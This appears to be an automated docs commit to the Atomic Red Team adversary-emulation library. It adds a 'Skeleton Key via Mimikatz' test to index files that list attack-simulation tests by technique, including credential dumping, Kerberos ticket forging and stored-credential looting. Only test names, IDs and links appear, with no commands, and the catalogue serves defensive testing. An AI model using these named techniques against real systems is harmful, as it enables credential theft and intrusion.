Generated docs from job=generate-docs branch=master [ci skip]

This commit is contained in:
Atomic Red Team doc generator
2026-04-16 03:09:01 +00:00
parent 16ddc50340
commit 3d22e294da
30 changed files with 473 additions and 75 deletions
@@ -2,7 +2,7 @@
# Atomic Red Team
![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1773-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1774-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
Atomic Red Team™ is a library of tests mapped to the
File diff suppressed because one or more lines are too long
@@ -609,6 +609,7 @@ defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,11,AWS - Config Lo
defense-evasion,T1564.003,Hide Artifacts: Hidden Window,1,Hidden Window,f151ee37-9e2b-47e6-80e4-550b9f999b7a,powershell
defense-evasion,T1564.003,Hide Artifacts: Hidden Window,2,Headless Browser Accessing Mockbin,0ad9ab92-c48c-4f08-9b20-9633277c4646,command_prompt
defense-evasion,T1564.003,Hide Artifacts: Hidden Window,3,Hidden Window-Conhost Execution,5510d22f-2595-4911-8456-4d630c978616,powershell
defense-evasion,T1556.001,Modify Authentication Process: Domain Controller Authentication,1,Skeleton Key via Mimikatz,0ee8081f-e9a7-4a2e-a23f-68473023184f,powershell
defense-evasion,T1027.006,HTML Smuggling,1,HTML Smuggling Remote Payload,30cbeda4-08d9-42f1-8685-197fad677734,powershell
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,1,Delete a single file - FreeBSD/Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,2,Delete an entire folder - FreeBSD/Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh
@@ -1425,6 +1426,7 @@ persistence,T1546.002,Event Triggered Execution: Screensaver,1,Set Arbitrary Bin
persistence,T1543.001,Create or Modify System Process: Launch Agent,1,Launch Agent,a5983dee-bf6c-4eaf-951c-dbc1a7b90900,bash
persistence,T1543.001,Create or Modify System Process: Launch Agent,2,Event Monitor Daemon Persistence,11979f23-9b9d-482a-9935-6fc9cd022c3e,bash
persistence,T1543.001,Create or Modify System Process: Launch Agent,3,Launch Agent - Root Directory,66774fa8-c562-4bae-a58d-5264a0dd9dd7,bash
persistence,T1556.001,Modify Authentication Process: Domain Controller Authentication,1,Skeleton Key via Mimikatz,0ee8081f-e9a7-4a2e-a23f-68473023184f,powershell
persistence,T1037.004,Boot or Logon Initialization Scripts: Rc.common,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash
persistence,T1037.004,Boot or Logon Initialization Scripts: Rc.common,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
persistence,T1037.004,Boot or Logon Initialization Scripts: Rc.common,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,sh
@@ -1832,6 +1834,7 @@ credential-access,T1003.008,"OS Credential Dumping: /etc/passwd, /etc/master.pas
credential-access,T1558.002,Steal or Forge Kerberos Tickets: Silver Ticket,1,Crafting Active Directory silver tickets with mimikatz,385e59aa-113e-4711-84d9-f637aef01f2c,powershell
credential-access,T1555.004,Credentials from Password Stores: Windows Credential Manager,1,Access Saved Credentials via VaultCmd,9c2dd36d-5c8b-4b29-8d72-a11b0d5d7439,command_prompt
credential-access,T1555.004,Credentials from Password Stores: Windows Credential Manager,2,WinPwn - Loot local Credentials - Invoke-WCMDump,fa714db1-63dd-479e-a58e-7b2b52ca5997,powershell
credential-access,T1556.001,Modify Authentication Process: Domain Controller Authentication,1,Skeleton Key via Mimikatz,0ee8081f-e9a7-4a2e-a23f-68473023184f,powershell
credential-access,T1003.003,OS Credential Dumping: NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt
credential-access,T1003.003,OS Credential Dumping: NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt
credential-access,T1003.003,OS Credential Dumping: NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt
@@ -428,6 +428,7 @@ defense-evasion,T1127.001,Trusted Developer Utilities Proxy Execution: MSBuild,2
defense-evasion,T1564.003,Hide Artifacts: Hidden Window,1,Hidden Window,f151ee37-9e2b-47e6-80e4-550b9f999b7a,powershell
defense-evasion,T1564.003,Hide Artifacts: Hidden Window,2,Headless Browser Accessing Mockbin,0ad9ab92-c48c-4f08-9b20-9633277c4646,command_prompt
defense-evasion,T1564.003,Hide Artifacts: Hidden Window,3,Hidden Window-Conhost Execution,5510d22f-2595-4911-8456-4d630c978616,powershell
defense-evasion,T1556.001,Modify Authentication Process: Domain Controller Authentication,1,Skeleton Key via Mimikatz,0ee8081f-e9a7-4a2e-a23f-68473023184f,powershell
defense-evasion,T1027.006,HTML Smuggling,1,HTML Smuggling Remote Payload,30cbeda4-08d9-42f1-8685-197fad677734,powershell
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,4,Delete a single file - Windows cmd,861ea0b4-708a-4d17-848d-186c9c7f17e3,command_prompt
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,5,Delete an entire folder - Windows cmd,ded937c4-2add-42f7-9c2c-c742b7a98698,command_prompt
@@ -1005,6 +1006,7 @@ persistence,T1197,BITS Jobs,3,"Persist, Download, & Execute",62a06ec5-5754-47d2-
persistence,T1197,BITS Jobs,4,Bits download using desktopimgdownldr.exe (cmd),afb5e09e-e385-4dee-9a94-6ee60979d114,command_prompt
persistence,T1546.010,Event Triggered Execution: AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
persistence,T1546.002,Event Triggered Execution: Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt
persistence,T1556.001,Modify Authentication Process: Domain Controller Authentication,1,Skeleton Key via Mimikatz,0ee8081f-e9a7-4a2e-a23f-68473023184f,powershell
persistence,T1037.001,Boot or Logon Initialization Scripts: Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt
persistence,T1137.002,Office Application Startup: Office Test,1,Office Application Startup Test Persistence (HKCU),c3e35b58-fe1c-480b-b540-7600fb612563,powershell
persistence,T1547.008,Boot or Logon Autostart Execution: LSASS Driver,1,Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt,8ecef16d-d289-46b4-917b-0dba6dc81cf1,powershell
@@ -1254,6 +1256,7 @@ credential-access,T1187,Forced Authentication,3,Trigger an authenticated RPC cal
credential-access,T1558.002,Steal or Forge Kerberos Tickets: Silver Ticket,1,Crafting Active Directory silver tickets with mimikatz,385e59aa-113e-4711-84d9-f637aef01f2c,powershell
credential-access,T1555.004,Credentials from Password Stores: Windows Credential Manager,1,Access Saved Credentials via VaultCmd,9c2dd36d-5c8b-4b29-8d72-a11b0d5d7439,command_prompt
credential-access,T1555.004,Credentials from Password Stores: Windows Credential Manager,2,WinPwn - Loot local Credentials - Invoke-WCMDump,fa714db1-63dd-479e-a58e-7b2b52ca5997,powershell
credential-access,T1556.001,Modify Authentication Process: Domain Controller Authentication,1,Skeleton Key via Mimikatz,0ee8081f-e9a7-4a2e-a23f-68473023184f,powershell
credential-access,T1003.003,OS Credential Dumping: NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt
credential-access,T1003.003,OS Credential Dumping: NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt
credential-access,T1003.003,OS Credential Dumping: NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt
@@ -134,7 +134,7 @@
- T1070.010 Relocate Malware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1070.009 Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036.010 Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Modify Authentication Process: Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.006 HTML Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.010 Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
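Review bot: after this rename the T1556.001 entry carries its parent technique as a prefix ("Modify Authentication Process: Domain Controller Authentication") while the sibling sub-technique two lines below, "T1556.005 Reversible Encryption", still uses the bare sub-technique name, so the same list now mixes two naming forms. If the generator takes the display name from the technique's own docs page once one exists, that explains the difference, but it is worth confirming that this is the intended source of the name rather than an inconsistency in the index generator.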
@@ -354,7 +354,7 @@
- T1546.010 Event Triggered Execution: AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.002 Event Triggered Execution: Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1505 Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Modify Authentication Process: Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.016 Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1668 Exclusive Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -519,7 +519,7 @@
- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1558.002 Steal or Forge Kerberos Tickets: Silver Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1555.004 Credentials from Password Stores: Windows Credential Manager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Modify Authentication Process: Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1111 Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1003.003 OS Credential Dumping: NTDS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -135,7 +135,7 @@
- T1070.010 Relocate Malware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1070.009 Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036.010 Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Modify Authentication Process: Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.006 HTML Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.010 Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -357,7 +357,7 @@
- T1546.010 Event Triggered Execution: AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.002 Event Triggered Execution: Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1505 Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Modify Authentication Process: Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.016 Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1668 Exclusive Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -522,7 +522,7 @@
- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1558.002 Steal or Forge Kerberos Tickets: Silver Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1555.004 Credentials from Password Stores: Windows Credential Manager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Modify Authentication Process: Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1111 Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1003.003 OS Credential Dumping: NTDS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -785,7 +785,8 @@
- T1601.001 Patch System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1070.009 Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036.010 Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1556.001 Modify Authentication Process: Domain Controller Authentication](../../T1556.001/T1556.001.md)
- Atomic Test #1: Skeleton Key via Mimikatz [windows]
- [T1027.006 HTML Smuggling](../../T1027.006/T1027.006.md)
- Atomic Test #1: HTML Smuggling Remote Payload [windows]
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1903,7 +1904,8 @@
- Atomic Test #2: Event Monitor Daemon Persistence [macos]
- Atomic Test #3: Launch Agent - Root Directory [macos]
- T1505 Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1556.001 Modify Authentication Process: Domain Controller Authentication](../../T1556.001/T1556.001.md)
- Atomic Test #1: Skeleton Key via Mimikatz [windows]
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.016 Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1037.004 Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md)
@@ -2509,7 +2511,8 @@
- [T1555.004 Credentials from Password Stores: Windows Credential Manager](../../T1555.004/T1555.004.md)
- Atomic Test #1: Access Saved Credentials via VaultCmd [windows]
- Atomic Test #2: WinPwn - Loot local Credentials - Invoke-WCMDump [windows]
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1556.001 Modify Authentication Process: Domain Controller Authentication](../../T1556.001/T1556.001.md)
- Atomic Test #1: Skeleton Key via Mimikatz [windows]
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1111 Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1003.003 OS Credential Dumping: NTDS](../../T1003.003/T1003.003.md)
@@ -224,7 +224,7 @@
- T1070.010 Relocate Malware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1070.009 Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036.010 Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Modify Authentication Process: Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.006 HTML Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.010 Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -474,7 +474,7 @@
- T1546.010 Event Triggered Execution: AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.002 Event Triggered Execution: Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1505 Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Modify Authentication Process: Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.016 Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1668 Exclusive Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -720,7 +720,7 @@
- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1558.002 Steal or Forge Kerberos Tickets: Silver Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1555.004 Credentials from Password Stores: Windows Credential Manager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Modify Authentication Process: Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1111 Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1003.003 OS Credential Dumping: NTDS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -180,7 +180,7 @@
- T1070.010 Relocate Malware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1070.009 Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036.010 Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Modify Authentication Process: Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.006 HTML Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.010 Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -421,7 +421,7 @@
- T1546.010 Event Triggered Execution: AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.002 Event Triggered Execution: Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1505 Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Modify Authentication Process: Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.016 Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1668 Exclusive Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -643,7 +643,7 @@
- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1558.002 Steal or Forge Kerberos Tickets: Silver Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1555.004 Credentials from Password Stores: Windows Credential Manager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Modify Authentication Process: Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1111 Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1003.003 OS Credential Dumping: NTDS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -563,7 +563,8 @@
- T1070.010 Relocate Malware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1070.009 Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036.010 Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1556.001 Modify Authentication Process: Domain Controller Authentication](../../T1556.001/T1556.001.md)
- Atomic Test #1: Skeleton Key via Mimikatz [windows]
- [T1027.006 HTML Smuggling](../../T1027.006/T1027.006.md)
- Atomic Test #1: HTML Smuggling Remote Payload [windows]
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1354,7 +1355,8 @@
- [T1546.002 Event Triggered Execution: Screensaver](../../T1546.002/T1546.002.md)
- Atomic Test #1: Set Arbitrary Binary as Screensaver [windows]
- T1505 Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1556.001 Modify Authentication Process: Domain Controller Authentication](../../T1556.001/T1556.001.md)
- Atomic Test #1: Skeleton Key via Mimikatz [windows]
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.016 Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1668 Exclusive Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1766,7 +1768,8 @@
- [T1555.004 Credentials from Password Stores: Windows Credential Manager](../../T1555.004/T1555.004.md)
- Atomic Test #1: Access Saved Credentials via VaultCmd [windows]
- Atomic Test #2: WinPwn - Loot local Credentials - Invoke-WCMDump [windows]
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1556.001 Modify Authentication Process: Domain Controller Authentication](../../T1556.001/T1556.001.md)
- Atomic Test #1: Skeleton Key via Mimikatz [windows]
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1111 Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1003.003 OS Credential Dumping: NTDS](../../T1003.003/T1003.003.md)
+3 -3
@@ -58,7 +58,7 @@
| | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Manipulation: Additional Cloud Credentials](../../T1098.001/T1098.001.md) | [Signed Binary Proxy Execution](../../T1218/T1218.md) | [OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow](../../T1003.008/T1003.008.md) | | | | | | |
| | | [Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | [Steal or Forge Kerberos Tickets: Silver Ticket](../../T1558.002/T1558.002.md) | | | | | | |
| | | [Create Account: Domain Account](../../T1136.002/T1136.002.md) | [Event Triggered Execution: Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | [Reflective Code Loading](../../T1620/T1620.md) | [Credentials from Password Stores: Windows Credential Manager](../../T1555.004/T1555.004.md) | | | | | | |
| | | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md) | Mutual Exclusion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md) | Mutual Exclusion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Domain Controller Authentication](../../T1556.001/T1556.001.md) | | | | | | |
| | | [Office Application Startup: Office Template Macros.](../../T1137.001/T1137.001.md) | [Event Triggered Execution: Change Default File Association](../../T1546.001/T1546.001.md) | Ignore Process Interrupts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | [Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md) | VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Time Based Evasion](../../T1497.003/T1497.003.md) | Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Emond](../../T1546.014/T1546.014.md) | [Signed Binary Proxy Execution: CMSTP](../../T1218.003/T1218.003.md) | [OS Credential Dumping: NTDS](../../T1003.003/T1003.003.md) | | | | | | |
@@ -102,7 +102,7 @@
